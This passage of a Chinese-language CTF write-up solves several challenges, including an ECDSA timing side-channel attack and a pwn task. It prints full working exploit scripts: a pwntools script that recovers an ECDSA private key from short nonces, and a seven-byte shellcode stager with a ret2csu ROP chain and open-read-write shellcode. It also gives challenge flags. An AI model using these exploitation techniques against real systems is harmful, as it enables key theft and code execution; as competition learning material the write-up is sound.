    2=abc, 3=def...
    """
    # 简单的数字提取,用于观察
    return text

# ================= 3. 执行解密逻辑 =================

print(f"[*] 当前输入 (Base64隐写结果): {stego_result}")

# 尝试 1: 先 ROT47
rot47_result = rot47_decode(stego_result)
print(f"\n[+] 尝试 ROT47 解密结果: {rot47_result}")

# 尝试 2: ROT47 后再进行键盘解密
final_try = keyboard_decode(rot47_result)
print(f"[+] 尝试 ROT47 + 键盘解密结果: {final_try}")

# 尝试 3: 如果 ROT47 结果包含数字,可能是九宫格
# 观察 ROT47 的结果
print("\n---------------- 分析 ----------------")
print("如果 'ROT47结果' 看起来像 [ ] P O 这种,请观察键盘位置。")
print("如果 'ROT47结果' 是数字,可能是手机九宫格。")
print("如果 'ROT47+键盘' 是有意义的单词,那就是它了。")
print("--------------------------------------")

运行可以得到结果

xmb4.png

这一步 ROT47 解密出的结果 {100/113/117/111/101}{102/120/100/119/116/107} 是非常标准的 ASCII 码 数组。

我们只需要做最后两步:

  1. ASCII 解码:把数字转成字母。
  2. 键盘解密:把得到的乱码字母按键盘顺序还原。

第一步:ASCII 转字符,ROT47 的结果被 {} 分成了两组。

第一组:100 113 117 111 101解密可以得到dquoe

第二组: 102 120 100 119 116 107解密可以得到fxdwtk

得到中间字符串:{dquoe}{fxdwtk}

第二步:键盘解密 (QWE Decrypt)

题目提示“关于键盘”,这里使用的是标准的 QWERTY -> ABCDE 映射。 (即:键盘上第一个键 q 对应字母表第一个字 a,第二个键 w 对应 b…)

解密 dquoe

  • d (键盘第13个键) -> 字母表第13个字 -> m
  • q (键盘第1个键) -> 字母表第1个字 -> a
  • u (键盘第7个键) -> 字母表第7个字 -> g
  • o (键盘第9个键) -> 字母表第9个字 -> i
  • e (键盘第3个键) -> 字母表第3个字 -> c
  • 单词:magic

解密 fxdwtk

  • f (键盘第14个键) -> n
  • x (键盘第21个键) -> u
  • d (键盘第13个键) -> m
  • w (键盘第2个键) -> b
  • t (键盘第5个键) -> e
  • k (键盘第18个键) -> r
  • 单词:number

将解出的两个单词拼接:

1
flag{magicnumber}

Crypto-Signature

题目

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
from ecdsa import SigningKey, SECP256k1
from random import getrandbits,shuffle
from hashlib import sha256
from time import time_ns
import os

FLAG = os.getenv("FLAG", "flag{fake_flag}}")
sk = SigningKey.generate(curve=SECP256k1)

def get_nbits_k(nbits):
    while True:
        k = getrandbits(nbits)
        if k.bit_length() == nbits:
            return k

def train(ncount,train_times,kbits):
    message = b"try hack me!"
    message_digest = sha256(message).digest()
    
    nonces = []
    for i in range(ncount):
        k = get_nbits_k(256)
        nonces.append(k)
        k = get_nbits_k(kbits)
        nonces.append(k)
    
    shuffle(nonces)
    
    costs = []
    sigs = []
    for k in nonces:
        tmp = 0
        for i in range(train_times):
            start = time_ns()
            signature = sk.sign_digest(message_digest, k=k)
            end = time_ns()
            tmp += end - start
        
        sigs.append(signature.hex())
        costs.append(tmp)
    
    return {'costs': costs, "sigs": sigs}

kbits = int(input("Enter kbits (between 1 and 256): "))
ncount,train_times = map(int, input("Enter ncount and train_times: ").split())
if kbits > 240:
    kbits = 256
print(train(ncount,train_times,kbits))
guess = int(input("Guess the privatekey used (in decimal): "))
if guess == int(sk.to_string().hex(),16):
    print(FLAG)

这是一个非常经典的 ECDSA 侧信道攻击 (Side-Channel Attack) 题目,结合了 Nonce 泄漏 (Nonce Leakage) 的利用。

核心原理

  1. 侧信道泄露 (Timing Leak)

    • 代码允许你指定 kbits(Nonce k 的位数)。
    • 它生成了一堆签名,一半使用了完整的 256 位 k,另一半使用了你指定的短 k(例如 8 位)。
    • 它测量并输出了签名的耗时 (costs)。
    • 在 Python 的 ecdsa 库或大数运算中,处理 小整数(8位)通常比处理 大整数(256位)要快(或者具有明显的时间特征)。
    • 攻击点:通过排序 costs,耗时最短的那些签名,极大概率使用的是小 nonce

  2. ECDSA 逆向 (Private Key Recovery)

    xmb5.png

    • 其中d是私钥,z是消息哈希k是 nonce。
    • xmb6.png
    • 暴力破解:如果你将 kbits 设置得很小(例如 8 位),k 的取值范围只有 2^7 到 2^8 (128~255)。我们不需要复杂的格攻击(Lattice Attack),直接暴力枚举这几百个可能的 k 值即可算出私钥 d。

攻击脚本exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
from pwn import *
import hashlib
from ecdsa.curves import SECP256k1
import ast  # 使用 ast.literal_eval 代替 eval,更安全且能处理 Python 格式字典

# ================= 配置 =================
# 题目地址
HOST = 'nc1.ctfplus.cn'
PORT = 16353

def solve():
    try:
        # 连接服务器
        io = remote(HOST, PORT)
        
        # SECP256k1 的阶 n
        n = int(SECP256k1.order)
        message = b"try hack me!"
        z_bytes = hashlib.sha256(message).digest()
        z = int.from_bytes(z_bytes, 'big')

        # 1. 发送参数
        print("[*] Sending parameters: kbits=8, ncount=40, train_times=100")
        
        io.recvuntil(b"Enter kbits")
        io.sendline(b"8")
        
        io.recvuntil(b"Enter ncount and train_times")
        io.sendline(b"40 100")

        # 2. 接收数据并清洗
        print("[*] Receiving data...")
        # 读取直到出现 'sigs' 关键字,确保数据已发完,或者读取一大块数据
        raw_data = io.recvuntil(b"Guess the privatekey", drop=True).decode()
        
        # --- 核心修复:提取字典部分 ---
        # 寻找第一个 '{' 和最后一个 '}'
        start_idx = raw_data.find('{')
        end_idx = raw_data.rfind('}') + 1
        
        if start_idx == -1 or end_idx == 0:
            print("[-] Error: Could not find JSON/Dict data in response.")
            print("Raw data:", raw_data)
            return

        dict_str = raw_data[start_idx:end_idx]
        print(f"[*] Parsed data length: {len(dict_str)}")
        
        # 使用 ast.literal_eval 解析 Python 风格的字典 (单引号)
        data = ast.literal_eval(dict_str)
        
        costs = data['costs']
        sigs_hex = data['sigs']
        
        print(f"[*] Received {len(costs)} signatures.")

        # 3. 筛选数据 (Timing Attack)
        pairs = []
        for i in range(len(costs)):
            pairs.append({
                'cost': costs[i],
                'sig': sigs_hex[i]
            })
        
        # 按耗时从小到大排序
        pairs.sort(key=lambda x: x['cost'])
        
        print("[*] Sorted signatures by execution time.")
        
        top_1 = pairs[0]['sig']
        top_2 = pairs[1]['sig']
        
        def parse_sig(hex_sig):
            r = int(hex_sig[:64], 16)
            s = int(hex_sig[64:], 16)
            return r, s

        r1, s1 = parse_sig(top_1)
        r2, s2 = parse_sig(top_2)

        print("[*] Cracking private key via brute-force on small k...")

        # 4. 爆破 k 并计算 d
        found_d = None
        
        # 爆破 k (范围 128-255)
        for k_guess in range(128, 256):
            r_inv = pow(r1, -1, n)
            val = (s1 * k_guess - z) % n
            candidate_d = (r_inv * val) % n
            
            # 验证
            s2_inv = pow(s2, -1, n)
            check_val = (z + r2 * candidate_d) % n
            k2_derived = (s2_inv * check_val) % n
            
            # 检查 k2 是否也是 8-bit
            if 128 <= k2_derived < 256:
                found_d = candidate_d
                print(f"[+] Found Private Key: {found_d}")
                break

        if found_d:
            print("[*] Sending Private Key...")
            # io.recvuntil(b"Guess the privatekey") 这一步上面已经读取过了(drop=True)
            # 此时缓冲区应该正好在输入点
            io.sendline(str(found_d).encode())
            
            # 获取结果
            result = io.recvall().decode()
            print("\n" + "="*30)
            print("[SUCCESS] FLAG IS HERE:")
            print(result.strip())
            print("="*30 + "\n")
        else:
            print("[-] Failed to find key. Try running again (timing noise).")
            
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        io.close()

if __name__ == "__main__":
    solve()

运行即可解密得到答案,写wp的时候比赛结束了,无法打开容器了,这个运行exp脚本就可以得到flag

Misc-禾信智安

xmb7.png

关注回复就行

xmb8.png

1
flag{b2730f7e-2d9e-4305-ab98-9a7ff3dda1bf}

Misc-神秘的编码纸条

!xmb9.png

直接base64解密

xmb10.png

1
flag{c6daa351-4d80-42ed-ba5a-2a19b1432be0}

Pwn-seven

拿到附件还是先checksec

xmb11.png

1
2
3
4
5
Arch:       amd64-64-little
RELRO:      Partial RELRO
Stack:      No canary found
NX:         NX enabled
PIE:        No PIE (0x400000)

接着使用ida来进行分析main

xmb12.png

1
2
3
4
5
6
7
int main() {
    setbuf(stdout, 0);
    setbuf(stdin, 0);
    seccomp();
    vuln();
    return 0;
}

接着跟着程序看seccomp函数

xmb13.png

沙箱规则: 禁止 execveexecveat,只能使用 ORW (open-read-write) 读取 flag。

接着看vuln函数

xmb14.png

通过上述代码可以得到以下一些核心限制

  1. 只有7字节: 输入的shellcode仅7字节,无法直接完成ORW
  2. 内存不可写: mprotect 将 0x600000 区域改为 R-X,无法通过 read 往该区域写入更多shellcode
  3. seccomp沙箱: 禁止 execve,必须用 ORW 读flag

执行shellcode时的寄存器状态,通过GDB调试确认:

xmb15.png

1
2
3
4
rax = 0          (sys_read 的系统调用号)
rdx = 0x600000   (buffer地址)
rdi = 0x600000
rsi = 0x1000

接着查找ROP gadgets

1
$ ROPgadget --binary ./attachment | grep -E "pop rdi|pop rsi|pop rdx|syscall|ret"

输出结果:

xmb16.png

1
2
3
4
5
6
7
0x00000000004013b3 : pop rdi ; ret
0x00000000004013b1 : pop rsi ; pop r15 ; ret
0x00000000004013b0 : pop r14 ; pop r15 ; ret
0x00000000004013ab : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004011fd : pop rbp ; ret
0x000000000040101a : ret
...

分析: 找到了 pop rdipop rsi,但没有 pop rdxsyscall!需要寻找其他方式设置rdx。

搜索rdx相关指令

1
$ objdump -d ./attachment | grep -E "syscall|rdx" | head -20

输出结果:xmb17.png

1
2
3
4
5
6
401136:   49 89 d1                mov    %rdx,%r9
40113a:   48 89 e2                mov    %rsp,%rdx
4012f3:   48 8b 55 f8             mov    -0x8(%rbp),%rdx
4012fc:   ff d2                   call   *%rdx
40135f:   49 89 d6                mov    %rdx,%r14
401390:   4c 89 f2                mov    %r14,%rdx

发现: 0x401390: mov %r14,%rdx 可以用r14设置rdx!

分析__libc_csu_init gadget

1
$ objdump -d ./attachment | grep -A5 -B5 "401390"

输出结果:

xmb18.png

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
40137c:   e8 7f fc ff ff          call   401000 <_init>
401381:   48 c1 fd 03             sar    $0x3,%rbp
401385:   74 1f                   je     4013a6 <__libc_csu_init+0x56>
401387:   31 db                   xor    %ebx,%ebx
401389:   0f 1f 80 00 00 00 00    nopl   0x0(%rax)
401390:   4c 89 f2                mov    %r14,%rdx
401393:   4c 89 ee                mov    %r13,%rsi
401396:   44 89 e7                mov    %r12d,%edi
401399:   41 ff 14 df             call   *(%r15,%rbx,8)
40139d:   48 83 c3 01             add    $0x1,%rbx
4013a1:   48 39 dd                cmp    %rbx,%rbp
4013a4:   75 ea                   jne    401390 <__libc_csu_init+0x40>
4013a6:   48 83 c4 08             add    $0x8,%rsp
4013aa:   5b                      pop    %rbx
4013ab:   5d                      pop    %rbp
4013ac:   41 5c                   pop    %r12
4013ae:   41 5d                   pop    %r13

分析: 这是经典的 ret2csu gadget!

gadget地址 作用
0x4013aa pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
0x401390 mov rdx,r14; mov rsi,r13; mov edi,r12d; call [r15+rbx*8]

通过这两个gadget组合,可以控制 rdi、rsi、rdx 三个参数并调用任意函数!

查找GOT表地址

1
$ objdump -R ./attachment

输出结果:

xmb19.png

1
2
3
4
5
6
7
8
9
10
DYNAMIC RELOCATION RECORDS
OFFSET           TYPE              VALUE 
0000000000404018 R_X86_64_JUMP_SLOT  seccomp_init
0000000000404020 R_X86_64_JUMP_SLOT  seccomp_rule_add
0000000000404028 R_X86_64_JUMP_SLOT  puts@GLIBC_2.2.5
0000000000404030 R_X86_64_JUMP_SLOT  seccomp_load
0000000000404038 R_X86_64_JUMP_SLOT  mmap@GLIBC_2.2.5
0000000000404040 R_X86_64_JUMP_SLOT  setbuf@GLIBC_2.2.5
0000000000404048 R_X86_64_JUMP_SLOT  read@GLIBC_2.2.5
0000000000404050 R_X86_64_JUMP_SLOT  mprotect@GLIBC_2.2.5

通过上述的信息的收集可以得到以下信息

关键地址:

  • read@got = 0x404048
  • mprotect@got = 0x404050
  1. 初始想法: 7字节shellcode调用read读取更多shellcode → 失败,因为mprotect后内存不可写
  2. 正确思路: 读取数据到栈上(可写),构造ROP链

Stage 1: 7字节shellcode

1
2
3
4
5
xor edi, edi    ; 2 bytes - rdi = 0 (stdin)
push rsp        ; 1 byte
pop rsi         ; 1 byte  - rsi = rsp (栈地址,可写)
syscall         ; 2 bytes - read(0, rsp, rdx)
ret             ; 1 byte  - 跳转到ROP链

效果: 将输入数据读取到栈上,然后 ret 执行栈上的ROP链。

Stage 2: ret2csu ROP链

程序中存在 __libc_csu_init 的经典gadget:

1
2
0x4013aa: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
0x401390: mov rdx,r14; mov rsi,r13; mov edi,r12d; call [r15+rbx*8]

利用 ret2csu 可以控制 rdi、rsi、rdx 三个参数并调用任意 GOT 函数。

ROP链执行流程:

  1. mprotect(0x600000, 0x1000, 7) - 将内存改回 RWX
  2. read(0, 0x600100, 0x1000) - 读取完整shellcode到可执行区域
  3. jmp 0x600100 - 执行shellcode

Stage 3: ORW Shellcode

1
2
3
open("/flag", 0, 0);
read(fd, rsp, 0x100);
write(1, rsp, 0x100);

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
#!/usr/bin/env python3
from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'

LOCAL = False
if LOCAL:
    p = process('./attachment')
else:
    p = remote('nc1.ctfplus.cn', 22085)

# === 地址 ===
read_got = 0x404048
mprotect_got = 0x404050
shellcode_addr = 0x600100  # shellcode写入的位置

# ret2csu gadgets
csu_init_gadget = 0x4013aa  # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
csu_call_gadget = 0x401390  # mov rdx,r14; mov rsi,r13; mov edi,r12d; call [r15+rbx*8]

# === Stage1: 7字节shellcode ===
# 读取ROP链到栈上,然后ret执行
# xor edi, edi  -> 31 ff (2 bytes) - rdi = 0 (stdin)
# push rsp      -> 54    (1 byte)
# pop rsi       -> 5e    (1 byte)  - rsi = rsp (栈,可写)
# syscall       -> 0f 05 (2 bytes) - read(0, rsp, rdx)
# ret           -> c3    (1 byte)  - ret到ROP链
stage1 = b'\x31\xff\x54\x5e\x0f\x05\xc3'

print(f"[*] Stage1 length: {len(stage1)} bytes")
print(f"[*] Stage1: {stage1.hex()}")

# === Stage2: ROP链 ===
def csu(func_got, rdi, rsi, rdx):
    """ret2csu gadget: 调用 func(rdi, rsi, rdx)"""
    payload = p64(csu_init_gadget)
    payload += p64(0)           # rbx = 0
    payload += p64(1)           # rbp = 1 (使循环只执行1次)
    payload += p64(rdi)         # r12 -> edi
    payload += p64(rsi)         # r13 -> rsi
    payload += p64(rdx)         # r14 -> rdx
    payload += p64(func_got)    # r15 -> 函数GOT地址
    payload += p64(csu_call_gadget)
    # call返回后会继续执行,需要填充7个值给pop
    payload += p64(0)           # add rsp, 8
    payload += p64(0)           # rbx
    payload += p64(0)           # rbp
    payload += p64(0)           # r12
    payload += p64(0)           # r13
    payload += p64(0)           # r14
    payload += p64(0)           # r15
    return payload

# ROP链:mprotect(0x600000, 0x1000, 7) -> read(0, shellcode_addr, 0x1000) -> jmp shellcode
rop = b''
rop += csu(mprotect_got, 0x600000, 0x1000, 7)  # mprotect使内存RWX
rop += csu(read_got, 0, shellcode_addr, 0x1000)  # 读取shellcode
rop += p64(shellcode_addr)  # 跳转执行shellcode

print(f"[*] ROP length: {len(rop)} bytes")

# === Stage3: ORW shellcode ===
shellcode = asm(shellcraft.open('/flag') + shellcraft.read('rax', 'rsp', 0x100) + shellcraft.write(1, 'rsp', 0x100))

print(f"[*] Shellcode length: {len(shellcode)} bytes")

# === 发送 ===
p.recvuntil(b'Do you know what 7 characters can do?')

# 发送stage1
p.send(stage1)
sleep(0.3)

# 发送ROP链
p.send(rop)
sleep(0.3)

# 发送shellcode
p.send(shellcode)

p.interactive()

运行可以得到结果

xmb20.png

1
CTFPLUS{f4918033-d28a-4280-ada3-5f58b250a8a2}

web-代码审计

通过题目可以知道是一道简单的代码审计

image-20251206115501648

xmb21.png

开始的时候以为是去获取flag

xmb22.png

我还去构造url获取了这个

xmb23.png

最后还是通过审计题目可以知道只是需要交导致 flag 输出的核心函数名作为 flag 提交,所以flag为

1
flag{call_user_func}